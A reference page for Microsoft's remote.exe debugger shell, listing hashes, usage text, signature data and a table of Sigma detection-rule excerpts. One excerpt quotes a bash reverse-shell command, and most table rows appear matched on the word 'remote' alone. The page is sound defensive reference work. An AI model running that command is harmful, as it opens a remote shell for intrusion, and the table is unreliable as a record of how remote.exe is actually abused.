remote.exe

• File Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
• Description: Microsoft Remote Std I/O Shell

Hashes

Type	Hash
MD5	C51957E9AFD84515C5F65A14B36FF144
SHA1	6E81E8590B3DAE0C085F0A4181C48E58A9E16127
SHA256	D3E433D4595EB2240EDC914C67AB85D9308BCFC903B185302FE3BC52215C5E6B
SHA384	577EFE93EBDE49B182A2EEA02A6070AF982A92CC44A18E8F88CF56B8180153DEBD4C7D706D24F9B6FCBC91EBE4888035
SHA512	4D01E521683A68BD7FAEBDC354296667BAA7F7E2281C770D5C56CB8F00AE041AA11C012D80E97DD8E61A0D06011C2C80EA3FBA54A42318761239C1ACC1C2832F
SSDEEP	768:Gt04y4dccel+YuNyPA6WBRI+M3UjrLw7Wov5YgTuyMpbAuSUlS5C:GactnC1Unkh5PTuZbAtU
IMP	5C1E1DA49D61DC05F5D31D7C4F52EECB
PESHA1	CF98407A8D3E3897B7DBB10169F2449A80C808D1
PE256	D0CF21A9D1F6EC3DCCAB63EE4D80F30265BEB41E9104E98ABA7EF658DE098CB2

Runtime Data

Usage (stdout):

   To Start the SERVER end of REMOTE
   ---------------------------------
   Syntax : REMOTE /S <"Cmd">     <Unique Id> [Param]
   Example1: REMOTE /S "i386kd -v" imbroglio
            To interact with this "Cmd" from some other machine,
            start the client end using:  REMOTE /C A0D5F083-3197-4 imbroglio

   Example2: REMOTE /S "i386kd -v" "name with spaces"
            start the client end using:  REMOTE /C A0D5F083-3197-4 "name with spaces"

   To Exit: @K 
   [Param]: /F  <Foreground color eg yellow, black..>
   [Param]: /B  <Background color eg lblue, white..>
   [Param]: /U  username or groupname
                specifies which users or groups may connect
                may be specified more than once, e.g
                /U user1 /U group2 /U user2
   [Param]: /UD username or groupname
                specifically denies access to that user or group
   [Param]: /UL [filename]
                Filename of string format security descriptor.
                If no filename, then the REMOTE_SDDL_FILE environment
                variable is used.
   [Param]: /V  Makes this session visible to remote /Q
   [Param]: /-V Hides this session from remote /q (invisible)
                By default, if "Cmd" looks like a debugger,
                the session is visible, otherwise not


   To Start the CLIENT end of REMOTE
   ---------------------------------
   Syntax : REMOTE /C <ServerName> "<Unique Id>" [Param]
   Example1: REMOTE /C A0D5F083-3197-4 imbroglio
            This would connect to a server session on A0D5F083-3197-4 with Id
            "imbroglio" if there is a REMOTE /S <"Cmd"> imbroglio
            running on A0D5F083-3197-4.

   Example2: REMOTE /C A0D5F083-3197-4 "name with spaces"
            This would connect to a server session on A0D5F083-3197-4 with Id
            "name with spaces" if there is a REMOTE /S <"Cmd"> "name with spaces"
            running on A0D5F083-3197-4.

   To Exit: @Q (Leaves the Remote Server Running)
   [Param]: /L <# of Lines to Get>
   [Param]: /F <Foreground color eg blue, lred..>
   [Param]: /K <Set keywords and colors from file>
   [Param]: /B <Background color eg cyan, lwhite..>

   Keywords And Colors File Format
   -------------------------------
   <KEYWORDs - CASE INSENSITIVE>
   <FOREGROUND>[, <BACKGROUND>]
   ...
   EX:
       ERROR
       black, lred
       WARNING
       lblue
       COLOR THIS LINE
       lgreen

   To Query the visible sessions on a server
   -----------------------------------------
   Syntax:  REMOTE /Q A0D5F083-3197-4
            This would retrieve the available <Unique Id>s
            visible connections on the computer named A0D5F083-3197-4.

Loaded Modules:

Path
C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll

Signature

• Status: Signature verified.
• Serial: 33000002CF6D2CC57CAA65A6D80000000002CF
• Thumbprint: 1A221B3B4FEF088B17BA6704FD088DF192D9E0EF
• Issuer: CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
• Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

• Original Filename: remote.exe
• Product Name: Microsoft Windows Operating System
• Company Name: Microsoft Corporation
• File Version: 10.0.19041.1
• Product Version: 10.0.19041.1
• Language: English (United States)
• Legal Copyright: Microsoft Corporation. All rights reserved.
• Machine Type: 32-bit

File Scan

• VirusTotal Detections: Unknown

Possible Misuse

The following table contains possible examples of remote.exe being misused. While remote.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source	Source File	Example	License
sigma	av_printernightmare_cve_2021_34527.yml	description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .	DRL 1.0
sigma	rpc_firewall_atsvc_lateral_movement.yml	title: Remote Schedule Task Lateral Movement via ATSvc	DRL 1.0
sigma	rpc_firewall_atsvc_lateral_movement.yml	description: Detects remote RPC calls to create or execute a scheduled task via ATSvc	DRL 1.0
sigma	rpc_firewall_atsvc_recon.yml	title: Remote Schedule Task Recon via AtScv	DRL 1.0
sigma	rpc_firewall_atsvc_recon.yml	description: Detects remote RPC calls to read information about scheduled tasks via AtScv	DRL 1.0
sigma	rpc_firewall_dcsync_attack.yml	description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.	DRL 1.0
sigma	rpc_firewall_efs_abuse.yml	title: Remote Encrypting File System Abuse	DRL 1.0
sigma	rpc_firewall_efs_abuse.yml	description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR	DRL 1.0
sigma	rpc_firewall_efs_abuse.yml	- Legitimate usage of remote file encryption	DRL 1.0
sigma	rpc_firewall_eventlog_recon.yml	title: Remote Event Log Recon	DRL 1.0
sigma	rpc_firewall_eventlog_recon.yml	description: Detects remote RPC calls to get event log information via EVEN or EVEN6	DRL 1.0
sigma	rpc_firewall_eventlog_recon.yml	- remote administrative tasks on Windows Events	DRL 1.0
sigma	rpc_firewall_itaskschedulerservice_lateral_movement.yml	title: Remote Schedule Task Lateral Movement via ITaskSchedulerService	DRL 1.0
sigma	rpc_firewall_itaskschedulerservice_lateral_movement.yml	description: Detects remote RPC calls to create or execute a scheduled task	DRL 1.0
sigma	rpc_firewall_itaskschedulerservice_recon.yml	title: Remote Schedule Task Recon via ITaskSchedulerService	DRL 1.0
sigma	rpc_firewall_itaskschedulerservice_recon.yml	description: Detects remote RPC calls to read information about scheduled tasks	DRL 1.0
sigma	rpc_firewall_printing_lateral_movement.yml	title: Remote Printing Abuse for Lateral Movement	DRL 1.0
sigma	rpc_firewall_printing_lateral_movement.yml	description: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR	DRL 1.0
sigma	rpc_firewall_remote_dcom_or_wmi.yml	title: Remote DCOM/WMI Lateral Movement	DRL 1.0
sigma	rpc_firewall_remote_dcom_or_wmi.yml	description: Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.	DRL 1.0
sigma	rpc_firewall_remote_dcom_or_wmi.yml	- Some administrative tasks on remote host	DRL 1.0
sigma	rpc_firewall_remote_registry_lateral_movement.yml	title: Remote Registry Lateral Movement	DRL 1.0
sigma	rpc_firewall_remote_registry_lateral_movement.yml	description: Detects remote RPC calls to modify the registry and possible execute code	DRL 1.0
sigma	rpc_firewall_remote_registry_lateral_movement.yml	- Remote administration of registry values	DRL 1.0
sigma	rpc_firewall_remote_registry_recon.yml	title: Remote Registry Recon	DRL 1.0
sigma	rpc_firewall_remote_registry_recon.yml	description: Detects remote RPC calls to collect information	DRL 1.0
sigma	rpc_firewall_remote_registry_recon.yml	- Remote administration of registry values	DRL 1.0
sigma	rpc_firewall_remote_server_service_abuse.yml	title: Remote Server Service Abuse	DRL 1.0
sigma	rpc_firewall_remote_server_service_abuse.yml	description: Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS	DRL 1.0
sigma	rpc_firewall_remote_server_service_abuse.yml	- Legitimate remote share creation	DRL 1.0
sigma	rpc_firewall_remote_service_lateral_movement.yml	title: Remote Server Service Abuse for Lateral Movement	DRL 1.0
sigma	rpc_firewall_remote_service_lateral_movement.yml	description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR	DRL 1.0
sigma	rpc_firewall_remote_service_lateral_movement.yml	- Administrative tasks on remote services	DRL 1.0
sigma	rpc_firewall_sasec_lateral_movement.yml	title: Remote Schedule Task Lateral Movement via SASec	DRL 1.0
sigma	rpc_firewall_sasec_lateral_movement.yml	description: Detects remote RPC calls to create or execute a scheduled task via SASec	DRL 1.0
sigma	rpc_firewall_sasec_recon.yml	title: Remote Schedule Task Lateral Movement via SASec	DRL 1.0
sigma	rpc_firewall_sasec_recon.yml	description: Detects remote RPC calls to read information about scheduled tasks via SASec	DRL 1.0
sigma	rpc_firewall_sharphound_recon_account.yml	description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.	DRL 1.0
sigma	rpc_firewall_sharphound_recon_sessions.yml	description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.	DRL 1.0
sigma	lnx_auditd_create_account.yml	description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.	DRL 1.0
sigma	lnx_auditd_network_service_scanning.yml	description: Detects enumeration of local or remote network services.	DRL 1.0
sigma	lnx_auditd_web_rce.yml	title: Webshell Remote Command Execution	DRL 1.0
sigma	lnx_file_copy.yml	title: Remote File Copy	DRL 1.0
sigma	lnx_file_copy.yml	description: Detects the use of tools that copy files from or to remote systems	DRL 1.0
sigma	proc_creation_macos_create_account.yml	description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.	DRL 1.0
sigma	proc_creation_macos_network_service_scanning.yml	description: Detects enumeration of local or remote network services.	DRL 1.0
sigma	proc_creation_macos_remote_system_discovery.yml	title: Macos Remote System Discovery	DRL 1.0
sigma	proc_creation_macos_remote_system_discovery.yml	description: Detects the enumeration of other remote systems.	DRL 1.0
sigma	net_connection_lnx_back_connect_shell_dev.yml	description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')	DRL 1.0
sigma	proc_creation_lnx_network_service_scanning.yml	description: Detects enumeration of local or remote network services.	DRL 1.0
sigma	proc_creation_lnx_remote_system_discovery.yml	title: Linux Remote System Discovery	DRL 1.0
sigma	proc_creation_lnx_remote_system_discovery.yml	description: Detects the enumeration of other remote systems.	DRL 1.0
sigma	cisco_cli_disable_logging.yml	description: Turn off logging locally or remote	DRL 1.0
sigma	cisco_cli_input_capture.yml	- Not commonly run by administrators, especially if remote logging is configured	DRL 1.0
sigma	cisco_cli_local_accounts.yml	description: Find local accounts being created or modified as well as remote authentication configurations	DRL 1.0
sigma	cisco_cli_local_accounts.yml	- When remote authentication is in place, this should not change often	DRL 1.0
sigma	zeek_dce_rpc_domain_user_enumeration.yml	description: Domain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29	DRL 1.0
sigma	zeek_dce_rpc_mitre_bzar_execution.yml	description: 'Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE'	DRL 1.0
sigma	zeek_dce_rpc_mitre_bzar_persistence.yml	description: 'Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.'	DRL 1.0
sigma	zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml	Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.	DRL 1.0
sigma	zeek_dce_rpc_printnightmare_print_driver_install.yml	Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).	DRL 1.0
sigma	zeek_dce_rpc_printnightmare_print_driver_install.yml	- Legitimate remote alteration of a printer driver.	DRL 1.0
sigma	zeek_http_omigod_no_auth_rce.yml	description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.	DRL 1.0
sigma	zeek_rdp_public_listener.yml	- Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet.	DRL 1.0
sigma	zeek_smb_converted_win_atsvc_task.yml	title: Remote Task Creation via ATSVC Named Pipe - Zeek	DRL 1.0
sigma	zeek_smb_converted_win_atsvc_task.yml	description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe	DRL 1.0
sigma	zeek_smb_converted_win_impacket_secretdump.yml	title: Possible Impacket SecretDump Remote Activity - Zeek	DRL 1.0
sigma	zeek_smb_converted_win_lm_namedpipe.yml	title: First Time Seen Remote Named Pipe - Zeek	DRL 1.0
sigma	zeek_smb_converted_win_lm_namedpipe.yml	description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes	DRL 1.0
sigma	proxy_download_susp_tlds_whitelist.yml	description: Detects executable downloads from suspicious remote systems	DRL 1.0
sigma	web_cve_2010_5278_exploitation_attempt.yml	possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to	DRL 1.0
sigma	web_cve_2020_0688_msexchange.yml	- https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/	DRL 1.0
sigma	web_cve_2020_5902_f5_bigip.yml	- https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/	DRL 1.0
sigma	web_fortinet_cve_2021_22123_exploit.yml	cs-referer\|contains: '/root/user/remote-user/saml-user/'	DRL 1.0
sigma	web_vsphere_cve_2021_21972_unauth_rce_exploit.yml	description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972	DRL 1.0
sigma	win_software_atera_rmm_agent_install.yml	description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators	DRL 1.0
sigma	win_vul_cve_2020_0688.yml	- https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/	DRL 1.0
sigma	win_susp_ntlm_rdp.yml	title: Potential Remote Desktop Connection to Non-Domain Host	DRL 1.0
sigma	win_admin_rdp_login.yml	title: Admin User Remote Logon	DRL 1.0
sigma	win_admin_rdp_login.yml	description: Detect remote login by Administrator user (depending on internal pattern).	DRL 1.0
sigma	win_atsvc_task.yml	title: Remote Task Creation via ATSVC Named Pipe	DRL 1.0
sigma	win_atsvc_task.yml	description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe	DRL 1.0
sigma	win_exploit_cve_2021_1675_printspooler_security.yml	description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527	DRL 1.0
sigma	win_gpo_scheduledtasks.yml	- if the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks	DRL 1.0
sigma	win_impacket_secretdump.yml	title: Possible Impacket SecretDump Remote Activity	DRL 1.0
sigma	win_lm_namedpipe.yml	title: First Time Seen Remote Named Pipe	DRL 1.0
sigma	win_lm_namedpipe.yml	description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes	DRL 1.0
sigma	win_lolbas_execution_of_nltest.yml	- attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc	DRL 1.0
sigma	win_mal_wceaux_dll.yml	description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host	DRL 1.0
sigma	win_not_allowed_rdp_access.yml	title: Denied Access To Remote Desktop	DRL 1.0
sigma	win_not_allowed_rdp_access.yml	description: This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.	DRL 1.0
sigma	win_remote_powershell_session.yml	title: Remote PowerShell Sessions Network Connections (WinRM)	DRL 1.0
sigma	win_remote_powershell_session.yml	- Legitimate use of remote PowerShell execution	DRL 1.0
sigma	win_remote_registry_management_using_reg_utility.yml	title: Remote Registry Management Using Reg Utility	DRL 1.0
sigma	win_remote_registry_management_using_reg_utility.yml	description: Remote registry management using REG utility from non-admin workstation	DRL 1.0
sigma	win_remote_registry_management_using_reg_utility.yml	- Legitimate usage of remote registry management by administrator	DRL 1.0
sigma	win_scrcons_remote_wmi_scripteventconsumer.yml	title: Remote WMI ActiveScriptEventConsumers	DRL 1.0
sigma	win_smb_file_creation_admin_shares.yml	title: SMB Create Remote File Admin Share	DRL 1.0
sigma	win_susp_failed_logons_single_source_kerberos.yml	- Remote administration tools	DRL 1.0
sigma	win_susp_failed_logons_single_source_kerberos2.yml	- Remote administration tools	DRL 1.0
sigma	win_susp_failed_logons_single_source_kerberos3.yml	- Remote administration tools	DRL 1.0
sigma	win_susp_failed_remote_logons_single_source.yml	description: Detects a source system failing to authenticate against a remote host with multiple users.	DRL 1.0
sigma	win_susp_logon_explicit_credentials.yml	title: Suspicious Remote Logon with Explicit Credentials	DRL 1.0
sigma	win_susp_samr_pwset.yml	title: Possible Remote Password Change Through SAMR	DRL 1.0
sigma	win_susp_samr_pwset.yml	description: Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events.	DRL 1.0
sigma	win_svcctl_remote_service.yml	title: Remote Service Activity via SVCCTL Named Pipe	DRL 1.0
sigma	win_svcctl_remote_service.yml	description: Detects remote service activity via remote access to the svcctl named pipe	DRL 1.0
sigma	win_svcctl_remote_service.yml	- https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html	DRL 1.0
sigma	win_susp_failed_guest_logon.yml	description: Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service	DRL 1.0
sigma	sysmon_cactustorch.yml	title: CACTUSTORCH Remote Thread Creation	DRL 1.0
sigma	sysmon_cactustorch.yml	description: Detects remote thread creation from CACTUSTORCH as described in references.	DRL 1.0
sigma	sysmon_cobaltstrike_process_injection.yml	description: Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons	DRL 1.0
sigma	sysmon_cobaltstrike_process_injection.yml	- https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f	DRL 1.0
sigma	sysmon_password_dumper_lsass.yml	title: Password Dumper Remote Thread in LSASS	DRL 1.0
sigma	sysmon_password_dumper_lsass.yml	description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.	DRL 1.0
sigma	sysmon_suspicious_remote_thread.yml	title: Suspicious Remote Thread Created	DRL 1.0
sigma	sysmon_suspicious_remote_thread.yml	to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is	DRL 1.0
sigma	sysmon_susp_powershell_rundll32.yml	title: PowerShell Rundll32 Remote Thread Creation	DRL 1.0
sigma	sysmon_susp_powershell_rundll32.yml	description: Detects PowerShell remote thread creation in Rundll32.exe	DRL 1.0
sigma	win_susp_rclone_exec.yml	- ' remote '	DRL 1.0
sigma	dns_query_win_gotoopener.yml	title: Query to GoToAssist Remote Access Software Domain	DRL 1.0
sigma	dns_query_win_gotoopener.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	dns_query_win_gotoopener.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	dns_query_win_logmein.yml	title: Query to LogMeIn Remote Access Software Domain	DRL 1.0
sigma	dns_query_win_logmein.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	dns_query_win_logmein.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	file_event_win_anydesk_artefact.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	file_event_win_anydesk_artefact.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	file_event_win_gotoopener_artefact.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	file_event_win_gotoopener_artefact.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	file_event_win_gotoopener_artefact.yml	TargetFilename\|contains: '\AppData\Local\Temp\LogMeInInc\GoToAssist Remote Support Expert\'	DRL 1.0
sigma	file_event_win_screenconnect_artefact.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	file_event_win_screenconnect_artefact.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	file_event_win_susp_teamviewer_remote_session.yml	title: TeamViewer Remote Session	DRL 1.0
sigma	file_event_win_susp_teamviewer_remote_session.yml	description: Detects the creation of log files during a TeamViewer remote session	DRL 1.0
sigma	file_event_win_writing_local_admin_share.yml	Aversaries may use to interact with a remote network share using Server Message Block (SMB).	DRL 1.0
sigma	image_load_svchost_dll_search_order_hijack.yml	description: IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine.	DRL 1.0
sigma	image_load_wsman_provider_image_load.yml	description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.	DRL 1.0
sigma	image_load_wsman_provider_image_load.yml	- https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture	DRL 1.0
sigma	net_connection_win_python.yml	description: Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation	DRL 1.0
sigma	net_connection_win_remote_powershell_session_network.yml	title: Remote PowerShell Session	DRL 1.0
sigma	net_connection_win_remote_powershell_session_network.yml	description: Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.	DRL 1.0
sigma	net_connection_win_remote_powershell_session_network.yml	- Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.	DRL 1.0
sigma	net_connection_win_silenttrinity_stager_msbuild_activity.yml	description: Detects a possible remote connections to Silenttrinity c2	DRL 1.0
sigma	net_connection_win_susp_rdp.yml	- Other Remote Desktop RDP tools	DRL 1.0
sigma	posh_pc_remote_powershell_session.yml	title: Remote PowerShell Session	DRL 1.0
sigma	posh_pc_remote_powershell_session.yml	description: Detects remote PowerShell sessions	DRL 1.0
sigma	posh_pc_remote_powershell_session.yml	- Legitimate use remote PowerShell sessions	DRL 1.0
sigma	posh_pc_susp_get_nettcpconnection.yml	description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.	DRL 1.0
sigma	posh_pm_remote_powershell_session.yml	title: Remote PowerShell Session	DRL 1.0
sigma	posh_pm_remote_powershell_session.yml	description: Detects remote PowerShell sessions	DRL 1.0
sigma	posh_pm_remote_powershell_session.yml	- Legitimate use remote PowerShell sessions	DRL 1.0
sigma	posh_pm_suspicious_smb_share_reco.yml	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and	DRL 1.0
sigma	posh_pm_susp_get_nettcpconnection.yml	description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.	DRL 1.0
sigma	posh_ps_capture_screenshots.yml	Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations	DRL 1.0
sigma	posh_ps_enable_psremoting.yml	title: Enable Windows Remote Management	DRL 1.0
sigma	posh_ps_enable_psremoting.yml	description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.	DRL 1.0
sigma	posh_ps_enable_psremoting.yml	- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management	DRL 1.0
sigma	posh_ps_invoke_command_remote.yml	title: Execute Invoke-command on Remote Host	DRL 1.0
sigma	posh_ps_invoke_command_remote.yml	description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.	DRL 1.0
sigma	posh_ps_remote_session_creation.yml	title: PowerShell Remote Session Creation	DRL 1.0
sigma	posh_ps_suspicious_extracting.yml	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.	DRL 1.0
sigma	posh_ps_suspicious_gwmi.yml	description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers	DRL 1.0
sigma	posh_ps_suspicious_networkcredential.yml	title: Suspicious Connection to Remote Account	DRL 1.0
sigma	posh_ps_suspicious_new_psdrive.yml	description: Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.	DRL 1.0
sigma	posh_ps_suspicious_smb_share_reco.yml	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and	DRL 1.0
sigma	posh_ps_susp_invoke_webrequest_useragent.yml	Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.	DRL 1.0
sigma	proc_access_win_mimikatz_trough_winrm.yml	title: Mimikatz through Windows Remote Management	DRL 1.0
sigma	process_creation_apt_gamaredon_ultravnc.yml	description: Gamaredon is known to use UltraVNC via command line for gaining remote access.	DRL 1.0
sigma	proc_creation_win_anydesk.yml	title: Use of Anydesk Remote Access Software	DRL 1.0
sigma	proc_creation_win_anydesk.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	proc_creation_win_anydesk.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	proc_creation_win_anydesk_silent_install.yml	description: AnyDesk Remote Desktop silent installation can be used by attacker to gain remote access.	DRL 1.0
sigma	proc_creation_win_evil_winrm.yml	description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.	DRL 1.0
sigma	proc_creation_win_gotoopener.yml	title: Use of GoToAssist Remote Access Software	DRL 1.0
sigma	proc_creation_win_gotoopener.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	proc_creation_win_gotoopener.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	proc_creation_win_logmein.yml	title: Use of LogMeIn Remote Access Software	DRL 1.0
sigma	proc_creation_win_logmein.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	proc_creation_win_logmein.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	proc_creation_win_lolbas_configsecuritypolicy.yml	remote:	DRL 1.0
sigma	proc_creation_win_lolbas_configsecuritypolicy.yml	condition: lolbas and remote	DRL 1.0
sigma	proc_creation_win_lolbas_diantz_remote_cab.yml	description: Download and compress a remote file and store it in a cab file on local machine.	DRL 1.0
sigma	proc_creation_win_mstsc.yml	title: Remote Desktop Protocol Use Mstsc	DRL 1.0
sigma	proc_creation_win_mstsc.yml	description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.	DRL 1.0
sigma	proc_creation_win_mstsc.yml	- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol	DRL 1.0
sigma	proc_creation_win_powershell_download_patterns.yml	- Software installers that pull packages from remote systems and execute them	DRL 1.0
sigma	proc_creation_win_remote_powershell_session_process.yml	title: Remote PowerShell Session Host Process (WinRM)	DRL 1.0
sigma	proc_creation_win_remote_powershell_session_process.yml	description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).	DRL 1.0
sigma	proc_creation_win_remote_powershell_session_process.yml	- Legitimate usage of remote Powershell, e.g. for monitoring purposes.	DRL 1.0
sigma	proc_creation_win_screenconnect.yml	title: Use of ScreenConnect Remote Access Software	DRL 1.0
